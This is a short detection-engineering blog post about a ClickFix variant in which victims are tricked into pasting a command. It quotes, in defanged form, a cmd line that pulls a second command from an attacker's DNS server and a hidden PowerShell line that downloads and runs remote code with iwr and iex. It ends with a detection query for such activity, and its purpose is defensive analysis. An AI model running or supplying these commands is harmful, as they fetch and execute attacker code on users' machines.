375. The New ClickFix Variant: Do We Really Need To Detect It?
Hello everyone!
Variants of the Malicious Copy and Paste technique (T1204.004) continue to remain popular among attackers. Today, we’ll look at another example and examine whether it actually affects our detection capabilities.
This particular variant was shared by researchers from Microsoft Threat Intelligence. The command that the victim is prompted to execute performs a DNS query to an attacker-controlled server and parses the Name: field from the response:
cmd /c "nslookup example.com 84.21.189[.]20 | findstr "^Name:" | for /f "tokens=1,* delims=:" %a in ('more') do @echo %b" | cmd && exit\1
Despite the originality of the approach, the Name: field contains a fairly ordinary command:
powershell.exe -ep bypass -w h -c "iwr hxxp://64.227.40[.]197/o -useb | iex"
As you can see, there is nothing particularly novel here, and you could search for similar activity, for example, like this:
event_type: "processcreatewin"
AND
proc_file_path: "powershell.exe"
AND
cmdline: ("iwr" AND "iex")
See you soon!

Comments
Post a Comment